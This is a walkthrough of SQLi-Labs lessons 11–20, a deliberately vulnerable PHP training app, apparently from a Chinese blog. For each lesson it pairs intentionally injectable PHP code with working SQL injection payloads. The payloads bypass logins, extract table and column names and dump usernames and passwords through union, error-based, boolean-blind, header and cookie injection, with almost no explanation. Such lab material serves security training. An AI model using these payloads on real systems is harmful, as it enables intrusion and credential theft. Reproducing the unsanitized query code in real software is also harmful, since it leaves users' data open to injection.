SQLi-Labs Less 11-20

SQLi-Labs Less 11-20

Less-11 POST - Error based - Single Quotes - String

Code:

if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        $sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
        if($row)
        {
                echo 'Your Login name:'. $row['username'];
                echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                print_r(mysql_error());

Code:

' or 1=1 --
' or 1=2 union select user(),database() -- 
' or 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 -- 
' or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 -- 
' or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 -- 
' or 1=2 union select username,password from security.users LIMIT 0,1 -- 

Less-12 POST - Error based - Double Quotes - String - with twist

Code:

if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        $uname='"'.$uname.'"';
        $passwd='"'.$passwd.'"';
        @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
        if($row)
        {
                echo 'Your Login name:'. $row['username'];
                echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                print_r(mysql_error());

Code:

") or 1=1 --
") or 1=2 union select user(),database() -- 
") or 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 -- 
") or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 -- 
") or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 -- 
") or 1=2 union select username,password from security.users LIMIT 0,1 -- 

Less-13 POST - Double injection - Single Quotes - String - with twist

Code:

if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
        if($row)
        {
                //echo " You Have successfully logged in " ;
                //echo 'Your Login name:'. $row['username'];
                //echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                print_r(mysql_error());

Code:

') or 1=1 -- 
') union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b -- 

Less-14 POST - Double injection - Single Quotes - String - with twist

Code:

if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        $uname='"'.$uname.'"';
        $passwd='"'.$passwd.'"';
        @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
        if($row)
        {
                //echo " You Have successfully logged in " ;
                //echo 'Your Login name:'. $row['username'];
                //echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                print_r(mysql_error());

Code:

" or 1=1 -- 
" union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b -- 

Less-15 POST - Blind - Boolian/time Based - Single Quotes

Code:

if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
        if($row)
        {
                //echo " You Have successfully logged in " ;
                //echo 'Your Login name:'. $row['username'];
                //echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                //print_r(mysql_error());

Code:

' or 1=1 -- 
' or ascii(substr(database(),1,1))=115 -- 
' or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 -- 
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 -- 
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 -- 
' or (ascii(substr((select username from users limit 0,1),1,1))) = 68 -- 
' or (ascii(substr((select password from users limit 0,1),1,1))) = 68 -- 

Less-16 POST - Blind - Boolian/time Based - Double Quotes

Code:

if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        $uname='"'.$uname.'"';
        $passwd='"'.$passwd.'"';
        @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
        if($row)
        {
                //echo " You Have successfully logged in " ;
                //echo 'Your Login name:'. $row['username'];
                //echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                //print_r(mysql_error());

Code:

") or 1=1 -- 
") or ascii(substr(database(),1,1))=115 -- 
") or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 -- 
") or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 -- 
") or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 -- 
") or (ascii(substr((select username from users limit 0,1),1,1))) = 68 -- 
") or (ascii(substr((select password from users limit 0,1),1,1))) = 68 -- 

Less-17 POST - Update Query - Error Based - String

Code:

';   
        $row1 = $row['username'];     
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
          echo "
";



        if (mysql_error())
        {
            echo '';
            print_r(mysql_error());
            echo "

"; echo "
"; } else { echo ''; //echo " You password has been successfully updated " ; echo " "; echo ""; } echo ''; //echo 'Your Password:' .$row['password']; echo ""; } else { echo ''; //echo "Bug off you Silly Dumb hacker"; echo "
"; echo ''; echo "
"; } } ?>

Code:

UPDATE users SET password = '$passwd' WHERE username='$row1'

' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b) --+

Less-18 POST - Header Injection - Uagent field - Error based

Code:

';
            $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
            mysql_query($insert);
            //echo 'Your IP ADDRESS is: ' .$IP;
            echo "";
            //echo "
";
            echo '';           
            echo 'Your User Agent is: ' .$uagent;
            echo "";
            echo "
";
            print_r(mysql_error());           
            echo "

";
            echo '';
            echo "
";

            }
        else
            {
            echo '';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "
"; echo "
"; echo ''; echo "
"; } } ?>

Code:

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #

Less-19 POST - Header Injection - Referer field - Error based

Code:

';
            $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
            mysql_query($insert);
            //echo 'Your IP ADDRESS is: ' .$IP;
            echo "";
            //echo "
";
            echo '';           
            echo 'Your Referer is: ' .$uagent;
            echo "";
            echo "
";
            print_r(mysql_error());           
            echo "

";
            echo '';
            echo "
";

            }
        else
            {
            echo '';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "
"; echo "
"; echo ''; echo "
"; } } ?>

Code:

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')

' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b),'192.168.1.11') #

Less-20 POST - Cookie Injection - Uagent field - Error based

Code:

 Welcome    Dhakkan 
"; echo "
"; echo "
"; echo ""; echo '
'; echo '
Username :    '; echo '
'; echo '
Password :      '; echo '

'; echo '
'; echo '
'; echo '
'; echo '
'; echo '
'; echo ''; echo '
'; echo ''; echo '
'; function check_input($value) { if(!empty($value)) { $value = substr($value,0,20); // truncation (see comments) } if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled { $value = stripslashes($value); } if (!ctype_digit($value)) // Quote if not a number { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return $value; } echo " "; echo " "; if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); $cookee = $row1['username']; if($row1) { echo ''; setcookie('uname', $cookee, time()+3600); header ('Location: index.php'); echo "I LOVE YOU COOKIES"; echo ""; echo ''; //echo 'Your Cookie is: ' .$cookee; echo ""; echo " "; print_r(mysql_error()); echo " "; echo ''; echo " "; } else { echo ''; //echo "Try again looser"; print_r(mysql_error()); echo "
"; echo "
"; echo ''; echo "
"; } } echo "
"; echo ''; echo '
'; } else { if(!isset($_POST['submit'])) { $cookee = $_COOKIE['uname']; $format = 'D d M Y - H:i:s'; $timestamp = time() + 3600; echo "
"; echo ' '; echo ''; echo " "; echo ' '; echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT']; echo " "; echo ''; echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; echo " "; echo ''; echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE "; echo ''; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); echo " "; $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1"; $result=mysql_query($sql); if (!$result) { die('Issue with your mysql: ' . mysql_error()); } $row = mysql_fetch_array($result); if($row) { echo ''; echo 'Your Login name:'. $row['username']; echo " "; echo ''; echo 'Your Password:' .$row['password']; echo ""; echo " "; echo 'Your ID:' .$row['id']; } else { echo "
"; echo ' '; echo ''; echo " "; //echo ''; } echo '
'; echo '
'; echo ''; echo '
'; echo '
'; } else { echo '
'; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo ''; echo " Your Cookie is deleted"; setcookie('uname', $row1['username'], time()-3600); header ('Location: index.php'); echo '

'; } echo " "; echo " "; //header ('Location: main.php'); echo " "; echo " "; //echo '
'; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'Cookie:'.$cookee."\n"); fclose($fp); } ?>

Code:

' or 1=1 -- 
' and ascii(substr(database(),1,1))=115 -- 
' and (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 -- 
' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 -- 
' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 -- 
' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 -- 
' and (ascii(substr((select password from users limit 0,1),1,1))) = 68 -- 

你可能感兴趣的:(SQL注入)